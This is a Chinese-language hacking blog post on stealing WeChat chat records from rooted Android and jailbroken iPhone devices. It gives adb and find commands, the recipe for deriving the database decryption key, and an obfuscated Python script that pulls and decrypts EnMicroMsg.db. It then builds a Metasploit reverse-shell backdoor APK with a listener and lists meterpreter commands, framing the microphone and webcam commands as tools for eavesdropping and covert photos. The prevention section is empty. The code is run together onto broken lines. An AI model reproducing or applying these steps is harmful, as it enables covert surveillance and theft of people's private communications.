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发布时间:2016年07月02日 评论数:抢沙发 阅读数:8785
“如何获取Android、iPhone手机上的微信聊天记录? ”
0×00 条件:
0×01 安卓:
安卓设备在root以后可以对系统文件存在最高级别的操作权限。比如,你在安卓设备上安装了微信,那么root以后通过adb shell你能对微信App的文件配置进行读取修改等操作。
Android应用程序的数据库文件通常会保存在 /data/data/packagename/database 文件夹下,微信App文件存放路径为:/data/data/com.tencent.mm/MicroMsg
以34位编码(类似于乱码)命名的文件夹中可找到微信账号的加密数据库文件 :EnMicroMsg.db
这里可以用windows环境下的SQLite Database Browser浏览器打开:
微信账号uin:即user information 微信用户信息识别码,获取微信UIN的方式有两种:
1.1 App 配置文件
find / -name “system_config_prefs.xml”
cat /data/data/com.tencent.mm/shared_prefs/system_config_prefs.xml | grep uin
<int name="default_uin" value="146****21" />
1.2 谷歌chrome浏览器登陆WEB版微信:
发送信息 抓包 find uin值
md5: http://www.spriteking.com/cmd5/ 左侧加密
得到32位小写md5值:a1edf9f5********************b5e5 取其前七位:a1edf9f输入到sql浏览器中。
echo -n "146****21354**********85" | md5sum | cut -c -7
import os import sys import re import hashlib import csv import time import locale import getopt def get_db(): os.popen('adb root').close()
text = os.popen( 'adb shell ls /data/data/com.tencent.mm/MicroMsg/*/EnMicroMsg.db').read() return text.splitlines()[- 1] if text else '' def get_default_uin(): os.popen('adb root').close()
text = os.popen( 'adb shell cat /data/data/com.tencent.mm/shared_prefs/system_config_prefs.xml').read()
default_uin = re.findall( 'name="default_uin" value="([0-9]+)"', text) return default_uin[0] if default_uin else 0 def get_device_ID(): text = os.popen('adb shell dumpsys iphonesubinfo').read()
device_ID = re.findall('Device ID = ([0-9]+)', text) return device_ID[0] if device_ID else 0 def get_md5(): default_uin = get_default_uin()
device_ID = get_device_ID() if default_uin and device_ID: return hashlib.md5(device_ID + default_uin).hexdigest()[0: 7] return '' def parse_msgcsv(msgcsv): locale.setlocale(locale.LC_ALL, '') if hasattr(msgcsv, 'title'):
msgcsv = [ooOoo0O + '\n' for ooOoo0O in msgcsv.splitlines()] pass OooO0 = csv.reader(msgcsv)
OooO0.next() for ooOoo0O in OooO0: try:
II11iiii1Ii, OO0o, Ooo, O0o0Oo, Oo00OOOOO, O0O, O00o0OO, name, iIi1ii1I1, o0, I11II1i, IIIII = ooOoo0O[
: 12] pass except: continue ooooooO0oo = 'me' if (Oo00OOOOO == '1') else name
IIiiiiiiIi1I1 = time.localtime(int(O00o0OO) / 1000)
I1IIIii = time.strftime("%Y-%m-%d %a %H:%M:%S", IIiiiiiiIi1I1) yield [name, I1IIIii, ooooooO0oo, iIi1ii1I1, o0] pass pass def get_names(chat): names = {} for name, I1IIIii, ooooooO0oo, iIi1ii1I1, o0 in chat:
names[name] = 1 pass return names.keys() def oo(chat, name=''): text = []
name = name.lower() for name, I1IIIii, ooooooO0oo, iIi1ii1I1, o0 in chat:
iIi1ii1I1 = iIi1ii1I1.replace('\n', '\n ')
o0 = ('\t' + o0) if o0 else '' if not name:
text.append('%s: %s %s: %s %s' %
(name, I1IIIii, ooooooO0oo, iIi1ii1I1, o0)) pass elif name.lower() == name:
text.append('%s %s: %s %s' %
(I1IIIii, ooooooO0oo, iIi1ii1I1, o0)) pass pass return '\n'.join(text) + '\n' def IIIii1II1II(dbn, key=''): child_stdin, child_stdout = os.popen2(['sqlcipher', dbn]) if key:
child_stdin.write('PRAGMA key=%s;\n' % ` key `)
child_stdin.write('pragma cipher_use_hmac=off;\n') pass child_stdin.write('.tables\n')
child_stdin.close() return child_stdout.read().split() def decrypt(dbn, key='', table='message'): table = table or 'message' child_stdin, child_stdout = os.popen2(['sqlcipher', dbn])
child_stdin.write('.header on\n')
child_stdin.write('.mode csv\n') if key:
child_stdin.write('PRAGMA key=%s;\n' % ` key `)
child_stdin.write('pragma cipher_use_hmac=off;\n') pass child_stdin.write('select * from %s;\n' % ` table `)
child_stdin.close() return child_stdout.read() def wechat2txt(names=[]): in_file = 'EnMicroMsg.db' out_file = 'message.csv' db = get_db()
md5 = get_md5()
os.popen('adb wait-for-device')
os.popen('adb pull %s %s' % (db, in_file)).close()
msgcsv = decrypt(in_file, md5) if msgcsv.find('\n') < 0: return 1 file(out_file, 'w').write(msgcsv)
msgs = list(parse_msgcsv(msgcsv)) if not msgs: return 1 if not names:
names = get_names(msgs) pass for name in names:
filename = 'message.%s.txt' % name
text = oo(msgs, name) if len(text) > 4:
file(filename, 'w').write(text) pass pass pass help_msg = '''Usage: wechat2txt.py [OPTIONS] [NAME]...
-h display this help and exit
''' def main(): try:
opts, args = getopt.getopt(sys.argv[1:], 'h') except getopt.error, e: print help_msg return 1 for opt, arg in opts: if opt == '-h': print help_msg return 1 pass names = args
text = wechat2txt(names) return not text if __name__ == "__main__":
0×02 苹果:
find /var/mobile/Containers/Data -name "MM.sqlite"
mkdir /cache find /var/mobile/Containers/Data -name "MM.sqlite" |xargs -I {} dirname {} | xargs -I {} cp -r {}/../../ /cache
在越狱iOS窃取隐私可参考:帮女神修手机的意外发现:隐匿在iOS文件系统中的隐私信息 一文
0×03 在安卓终端植入后门
3.1 实验环境
Kali Linux(Hack):
cd Desktop
msfpayload android/meterpreter/reverse_tcp LHOST= LPORT=443 R >0xroot.apk
3.3 运行metasploit控制台
msfconsole use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST set LPORT 443 run
3.4 安装&运行后门App
meterpreter > help
Core Commands
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information about active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
help Help menu
info Displays information about a Post module
interact Interacts with a channel
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
use Deprecated alias for 'load' write Writes data to a channel
Stdapi: File system Commands
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory
Stdapi: Networking Commands
Command Description
------- -----------
ifconfig Display interfaces
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table
Stdapi: System Commands
Command Description
------- -----------
execute Execute a command
getuid Get the user that the server is running as
ps List running processes
shell Drop into a system command shell
sysinfo Gets information about the remote system, such as OS
Stdapi: Webcam Commands
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
record_mic 通过手机麦克风进行窃听、录音;
webcam_list 列出安卓设备的所有摄像头;
webcam_snap 通过摄像头进行偷拍…
0×04 演示视频
0×05 APK后门分析:
0×06 预防&安全建议
0×07 文中工具下载地址:
SQLite Database Browser:http://pan.baidu.com/s/1nuWlDgd
0×08 参考&感谢
How To Decrypt WeChat EnMicroMsg.db Database?
Hacking Android Smartphone Tutorial using Metasploit
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